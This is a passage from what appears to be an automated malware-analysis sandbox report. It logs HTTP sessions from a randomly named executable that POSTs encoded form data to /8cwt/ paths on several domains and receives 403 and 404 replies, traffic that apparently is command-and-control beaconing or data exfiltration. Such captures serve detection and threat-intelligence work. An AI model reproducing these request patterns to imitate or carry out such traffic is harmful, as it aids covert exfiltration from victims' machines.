                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.accentbathrooms.com
                                      Referer: http://www.accentbathrooms.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 34 37 79 38 79 63 32 55 70 73 4d 42 56 76 6d 41 6a 76 53 63 65 77 49 36 6e 64 79 63 32 42 4a 42 79 66 6e 30 55 35 36 73 4a 4e 5a 52 38 6d 6c 6f 35 4c 50 6d 42 52 67 44 47 42 43 7a 72 61 37 39 6c 7a 35 39 4f 37 56 49 38 62 73 6b 57 6f 72 43 4c 74 2f 48 65 4a 38 6d 64 52 67 32 52 50 71 54 4e 34 65 6f 35 62 44 47 4c 78 4e 50 30 2b 39 6a 41 35 55 31 75 59 47 51 78 59 54 66 34 70 33 37 71 75 49 45 6c 79 75 71 4f 45 69 35 69 57 50 54 35 52 6f 34 2b 48 4a 64 66 45 2b 4f 39 6d 47 31 6d 74 4b 46 54 30 37 4a 41 34 55 45 32 73 59 31 6a 4c 59 6b 78 66 41 4c 4a 6e 2f 78 56 35 43 31 61 77 3d 3d
                                      Data Ascii: 24eluX=47y8yc2UpsMBVvmAjvScewI6ndyc2BJByfn0U56sJNZR8mlo5LPmBRgDGBCzra79lz59O7VI8bskWorCLt/HeJ8mdRg2RPqTN4eo5bDGLxNP0+9jA5U1uYGQxYTf4p37quIElyuqOEi5iWPT5Ro4+HJdfE+O9mG1mtKFT07JA4UE2sY1jLYkxfALJn/xV5C1aw==
                                      Jun 4, 2024 14:17:43.562356949 CEST380INHTTP/1.1 403 Forbidden
                                      Server: nginx/1.14.2
                                      Date: Tue, 04 Jun 2024 12:17:43 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Content-Encoding: gzip
                                      Data Raw: 62 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 90 31 0e c2 30 0c 45 77 24 ee 60 ba a7 a1 d0 31 64 41 20 31 30 71 82 a4 36 4d a4 34 41 21 12 f4 f6 24 50 24 c4 cc c8 e8 ef e7 67 cb c2 a4 c1 c9 f9 4c 18 52 28 45 b2 c9 91 6c 97 6b d8 87 a8 2d 22 79 c1 5f a1 e0 4f 24 a3 3a e0 08 ba ef 82 0b 71 53 dd 8c 4d 54 15 45 47 3e 51 94 c2 34 df 86 9c 08 3e b5 cb ae 0c 4d 95 ef ad bf f3 a6 6e da 7a f5 89 f0 b2 a4 48 f9 fb c0 05 63 a0 e0 a2 10 ad ef 21 05 40 7b 55 da 11 1c 4f 87 1d 28 8f b0 35 31 0c 04 e7 68 c9 a3 1b 81 62 0c 31 4f f4 04 8c 15 d7 5f f1 cb 5f 3c 00 d2 96 ee 17 3b 02 00 00 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: bc10Ew$`1dA 10q6M4A!$P$gLR(Elk-"y_O$:qSMTEG>Q4>MnzHc!@{UO(51hb1O__<;0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      14192.168.11.304986166.81.203.196802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:17:46.092276096 CEST727OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.accentbathrooms.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.accentbathrooms.com
                                      Referer: http://www.accentbathrooms.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 34 37 79 38 79 63 32 55 70 73 4d 42 55 4d 75 41 6c 38 4b 63 59 51 49 35 36 74 79 63 6a 78 49 49 79 66 37 30 55 35 53 43 49 2f 74 52 38 48 56 6f 36 4a 33 6d 43 52 67 44 4f 68 43 36 68 36 37 79 6c 7a 30 41 4f 2f 64 49 38 59 51 6b 57 74 76 43 4b 65 6e 45 4d 70 38 65 62 52 67 77 63 76 71 54 4e 34 65 6f 35 66 6a 38 4c 79 39 50 30 74 6c 6a 41 63 34 32 77 6f 47 50 6e 49 54 66 38 70 33 67 71 75 4a 52 6c 77 61 51 4f 41 53 35 69 58 2f 54 36 45 45 6e 30 48 4a 45 53 6b 2f 6b 79 45 71 77 73 70 36 36 65 53 6a 41 4b 4e 4d 36 7a 37 70 76 2b 49 73 6d 69 2f 38 6d 56 6d 53 5a 58 37 44 75 48 2f 37 4d 42 42 79 38 42 53 63 6c 77 6b 42 66 41 6a 71 4a 41 73 67 3d
                                      Data Ascii: 24eluX=47y8yc2UpsMBUMuAl8KcYQI56tycjxIIyf70U5SCI/tR8HVo6J3mCRgDOhC6h67ylz0AO/dI8YQkWtvCKenEMp8ebRgwcvqTN4eo5fj8Ly9P0tljAc42woGPnITf8p3gquJRlwaQOAS5iX/T6EEn0HJESk/kyEqwsp66eSjAKNM6z7pv+Ismi/8mVmSZX7DuH/7MBBy8BSclwkBfAjqJAsg=
                                      Jun 4, 2024 14:17:46.250518084 CEST380INHTTP/1.1 403 Forbidden
                                      Server: nginx/1.14.2
                                      Date: Tue, 04 Jun 2024 12:17:46 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Content-Encoding: gzip
                                      Data Raw: 62 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 90 31 0e c2 30 0c 45 77 24 ee 60 ba a7 a1 d0 31 64 41 20 31 30 71 82 a4 36 4d a4 34 41 21 12 f4 f6 24 50 24 c4 cc c8 e8 ef e7 67 cb c2 a4 c1 c9 f9 4c 18 52 28 45 b2 c9 91 6c 97 6b d8 87 a8 2d 22 79 c1 5f a1 e0 4f 24 a3 3a e0 08 ba ef 82 0b 71 53 dd 8c 4d 54 15 45 47 3e 51 94 c2 34 df 86 9c 08 3e b5 cb ae 0c 4d 95 ef ad bf f3 a6 6e da 7a f5 89 f0 b2 a4 48 f9 fb c0 05 63 a0 e0 a2 10 ad ef 21 05 40 7b 55 da 11 1c 4f 87 1d 28 8f b0 35 31 0c 04 e7 68 c9 a3 1b 81 62 0c 31 4f f4 04 8c 15 d7 5f f1 cb 5f 3c 00 d2 96 ee 17 3b 02 00 00 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: bc10Ew$`1dA 10q6M4A!$P$gLR(Elk-"y_O$:qSMTEG>Q4>MnzHc!@{UO(51hb1O__<;0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      15192.168.11.304986266.81.203.196802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:17:48.780070066 CEST1644OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.accentbathrooms.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.accentbathrooms.com
                                      Referer: http://www.accentbathrooms.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 34 37 79 38 79 63 32 55 70 73 4d 42 55 4d 75 41 6c 38 4b 63 59 51 49 35 36 74 79 63 6a 78 49 49 79 66 37 30 55 35 53 43 49 2f 31 52 39 78 70 6f 35 75 62 6d 4e 78 67 44 45 42 43 2f 68 36 37 76 6c 7a 73 4d 4f 2f 5a 59 38 64 55 6b 45 66 6e 43 4e 72 54 45 56 5a 38 65 5a 52 67 78 52 50 71 38 4e 34 4f 30 35 62 50 38 4c 79 39 50 30 72 68 6a 4a 70 55 32 79 6f 47 51 78 59 54 70 34 70 32 50 71 76 68 42 6c 77 65 41 4f 7a 61 35 69 33 76 54 34 32 38 6e 70 58 4a 52 58 6b 2f 38 79 45 6e 67 73 76 65 51 65 58 65 62 4b 4b 67 36 78 4f 6b 57 37 6f 77 42 39 64 4d 77 51 33 2b 32 57 4c 72 6a 65 73 4c 77 4b 69 4f 4e 47 54 30 58 2b 78 46 44 59 78 79 46 5a 5a 62 49 6a 68 63 38 44 50 65 46 51 53 48 70 77 2b 62 53 33 65 6c 53 77 41 59 57 76 68 67 51 52 43 61 4a 57 6b 37 2b 69 68 58 66 79 70 56 4b 4c 67 62 77 69 7a 6b 63 61 68 33 37 57 6d 57 56 4b 79 51 4e 42 69 5a 53 5a 39 55 2b 30 7a 78 31 75 54 6c 73 45 33 75 71 41 35 49 33 39 44 57 31 61 38 56 2b 4b 70 4c 54 6e 66 4f 2f 44 4e 4b 79 37 54 31 7a 70 58 42 [TRUNCATED]
                                      Data Ascii: 24eluX=47y8yc2UpsMBUMuAl8KcYQI56tycjxIIyf70U5SCI/1R9xpo5ubmNxgDEBC/h67vlzsMO/ZY8dUkEfnCNrTEVZ8eZRgxRPq8N4O05bP8Ly9P0rhjJpU2yoGQxYTp4p2PqvhBlweAOza5i3vT428npXJRXk/8yEngsveQeXebKKg6xOkW7owB9dMwQ3+2WLrjesLwKiONGT0X+xFDYxyFZZbIjhc8DPeFQSHpw+bS3elSwAYWvhgQRCaJWk7+ihXfypVKLgbwizkcah37WmWVKyQNBiZSZ9U+0zx1uTlsE3uqA5I39DW1a8V+KpLTnfO/DNKy7T1zpXBj1ZxOTOl0wHK+/p5M/yXrP7psvzQA7/adRdlekTFWZTrnOIwFjmeddmmTRJ5NqkNkAuu9emYlRacP4LI1y8rVPlmc4+71LVVDL3a/78nWMRnXy/SQN/BAumdPz8WZR/yiUkn8IwZ2vccn8YY7m/SlME9J668NROUiVnVUpSl8XVXG0ayywdkOkb9eHfvqQydJB5fJWm2LJJcNZrxvjT/pxSoFaP/yFpPBOurJmfbWh/Kc3bap4yoZlrGLdH1vbXOM847Ixz2wwiUE57g6omsgD/KkeKFz84vrBRjViWZdTFBWey6G2Ubg3GBD0U1yX+AIV8FEjq0F8ytOqQe0fA7NLuN9fWn4eNB6c4VKhB3O41eW8FLIMwMb5nA03FUOdjeITegdMcCHLtZzkpYdb9ivE+v1xmMpe6+FCxWpG466uPbDBROvKDxhv6gjqIa7yljcTUXpaF+hKicRAdtDysMLK88VxFeU8mJgvZGJVKRUObrpAcTeEGp4Xo74GCgEQoPl9xo/myYIUSlb8ylLEN91WgO7RhdVAZd+pBjkk1gYcRJoy9iSJ8Ubnr5xeqMqZ0lYj5NhRCOuC2Thew2Udc/6gBI57m2EriY0eEPO5Pd1KQTXksxsE31F8N3eotg5GWCW0ZI1Co0FjBiU+KVzuvEg8WqR5vz2ClVFV [TRUNCATED]
                                      Jun 4, 2024 14:17:48.938534021 CEST380INHTTP/1.1 403 Forbidden
                                      Server: nginx/1.14.2
                                      Date: Tue, 04 Jun 2024 12:17:48 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Content-Encoding: gzip
                                      Data Raw: 62 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 90 31 0e c2 30 0c 45 77 24 ee 60 ba a7 a1 d0 31 64 41 20 31 30 71 82 a4 36 4d a4 34 41 21 12 f4 f6 24 50 24 c4 cc c8 e8 ef e7 67 cb c2 a4 c1 c9 f9 4c 18 52 28 45 b2 c9 91 6c 97 6b d8 87 a8 2d 22 79 c1 5f a1 e0 4f 24 a3 3a e0 08 ba ef 82 0b 71 53 dd 8c 4d 54 15 45 47 3e 51 94 c2 34 df 86 9c 08 3e b5 cb ae 0c 4d 95 ef ad bf f3 a6 6e da 7a f5 89 f0 b2 a4 48 f9 fb c0 05 63 a0 e0 a2 10 ad ef 21 05 40 7b 55 da 11 1c 4f 87 1d 28 8f b0 35 31 0c 04 e7 68 c9 a3 1b 81 62 0c 31 4f f4 04 8c 15 d7 5f f1 cb 5f 3c 00 d2 96 ee 17 3b 02 00 00 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: bc10Ew$`1dA 10q6M4A!$P$gLR(Elk-"y_O$:qSMTEG>Q4>MnzHc!@{UO(51hb1O__<;0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      16192.168.11.304986366.81.203.196802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:17:51.469299078 CEST434OUTGET /8cwt/?24eluX=15acxp6jrOd/buvS9YLoVCwQt/eIj0wV8tP3YL3PMsIjyFVitYjgFC8LDxGQh6T0kTJLIrMUzadAXsDAGdfiNfgPYx4xbqKJILHq2u+5CghFrM1CdZcxiKw=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.accentbathrooms.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:17:51.630954027 CEST721INHTTP/1.1 404 Not Found
                                      Server: nginx/1.14.2
                                      Date: Tue, 04 Jun 2024 12:17:51 GMT
                                      Content-Type: text/html
                                      Content-Length: 571
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 [TRUNCATED]
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      17192.168.11.3049864162.43.104.164802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:18:02.482475996 CEST701OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.shun-yamagata.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.shun-yamagata.com
                                      Referer: http://www.shun-yamagata.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 6f 38 61 74 65 31 71 36 4d 71 6f 6f 2b 67 7a 59 4b 37 2b 53 72 66 36 4d 63 63 37 75 38 42 7a 63 75 2b 51 74 73 31 48 47 57 51 63 4f 50 53 36 39 74 47 44 68 2f 34 4c 6e 62 49 6b 2b 44 33 52 62 36 4b 38 79 73 4b 56 64 4e 6a 4b 4a 76 4f 6b 72 5a 4f 56 69 74 36 57 70 70 30 6c 49 61 6e 61 36 5a 38 46 52 73 36 63 6b 67 2f 52 68 6b 43 6f 6c 43 67 58 78 74 49 70 4c 4f 45 2f 44 38 67 56 6e 67 4b 59 76 6e 6d 42 75 52 69 71 65 2b 47 39 77 73 69 58 35 45 47 53 33 4f 69 39 7a 69 46 42 4a 50 63 65 35 52 58 47 4e 37 33 6b 6a 58 76 63 61 37 77 6e 4e 63 72 36 79 2f 2f 4a 47 35 6e 54 58 6d 67 3d 3d
                                      Data Ascii: 24eluX=o8ate1q6Mqoo+gzYK7+Srf6Mcc7u8Bzcu+Qts1HGWQcOPS69tGDh/4LnbIk+D3Rb6K8ysKVdNjKJvOkrZOVit6Wpp0lIana6Z8FRs6ckg/RhkColCgXxtIpLOE/D8gVngKYvnmBuRiqe+G9wsiX5EGS3Oi9ziFBJPce5RXGN73kjXvca7wnNcr6y//JG5nTXmg==
                                      Jun 4, 2024 14:18:02.757194042 CEST1289INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:18:01 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Last-Modified: Tue, 25 Jul 2023 10:57:57 GMT
                                      ETag: W/"afe-6014d9a904f4f"
                                      Content-Encoding: gzip
                                      Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b [TRUNCATED]
                                      Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(*&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D|v$g|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HE*ske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>|Y|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D|Wz7t!9),KQ8xa%9s{Qo/|mu1.C-r [TRUNCATED]
                                      Jun 4, 2024 14:18:02.757206917 CEST300INData Raw: b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e 89 ab e2 96 58 e3 37 f9 df fc 0b be 0e bf 77 c5 13 38 8d ab fc e1 ea 15 7e 9f 5f e1 3b fc 29 bf c5 77 f9 8f 52 d7 59 02 50 39 ed df 44 8e 87 c3 b0 64 ea c5 69
                                      Data Ascii: -%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-sX[J{m/W~?,;s:


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      18192.168.11.3049865162.43.104.164802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:18:05.285547972 CEST721OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.shun-yamagata.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.shun-yamagata.com
                                      Referer: http://www.shun-yamagata.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 6f 38 61 74 65 31 71 36 4d 71 6f 6f 38 42 6a 59 50 62 43 53 74 2f 36 50 5a 63 37 75 79 68 7a 41 75 2f 73 74 73 33 72 57 57 6a 34 4f 50 77 69 39 2f 43 66 68 2b 34 4c 6e 55 6f 6b 37 4d 58 52 55 36 4b 78 52 73 4c 46 64 4e 67 32 4a 76 50 34 72 5a 34 64 39 74 71 57 72 67 55 6c 4b 65 6e 61 36 5a 38 46 52 73 36 49 4f 67 2f 5a 68 34 69 59 6c 43 45 4c 75 67 6f 70 49 65 55 2f 44 34 67 56 6a 67 4b 5a 66 6e 6c 46 58 52 67 53 65 2b 43 35 77 73 77 76 32 64 32 53 78 45 43 38 62 68 32 34 4e 45 64 6d 70 51 33 32 4f 2f 6e 55 48 62 59 74 41 6d 7a 54 50 50 4c 47 66 6a 2b 6b 75 37 6c 53 4d 37 6c 64 62 62 53 65 6e 7a 58 39 6e 65 68 33 57 72 4a 73 71 41 35 45 3d
                                      Data Ascii: 24eluX=o8ate1q6Mqoo8BjYPbCSt/6PZc7uyhzAu/sts3rWWj4OPwi9/Cfh+4LnUok7MXRU6KxRsLFdNg2JvP4rZ4d9tqWrgUlKena6Z8FRs6IOg/Zh4iYlCELugopIeU/D4gVjgKZfnlFXRgSe+C5wswv2d2SxEC8bh24NEdmpQ32O/nUHbYtAmzTPPLGfj+ku7lSM7ldbbSenzX9neh3WrJsqA5E=
                                      Jun 4, 2024 14:18:05.562218904 CEST1289INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:18:04 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Last-Modified: Tue, 25 Jul 2023 10:57:57 GMT
                                      ETag: W/"afe-6014d9a904f4f"
                                      Content-Encoding: gzip
                                      Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b [TRUNCATED]
                                      Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(*&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D|v$g|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HE*ske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>|Y|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D|Wz7t!9),KQ8xa%9s{Qo/|mu1.C-r [TRUNCATED]
                                      Jun 4, 2024 14:18:05.562242031 CEST300INData Raw: b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e 89 ab e2 96 58 e3 37 f9 df fc 0b be 0e bf 77 c5 13 38 8d ab fc e1 ea 15 7e 9f 5f e1 3b fc 29 bf c5 77 f9 8f 52 d7 59 02 50 39 ed df 44 8e 87 c3 b0 64 ea c5 69
                                      Data Ascii: -%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-sX[J{m/W~?,;s:


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      19192.168.11.3049866162.43.104.164802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:18:08.121305943 CEST1638OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.shun-yamagata.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.shun-yamagata.com
                                      Referer: http://www.shun-yamagata.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
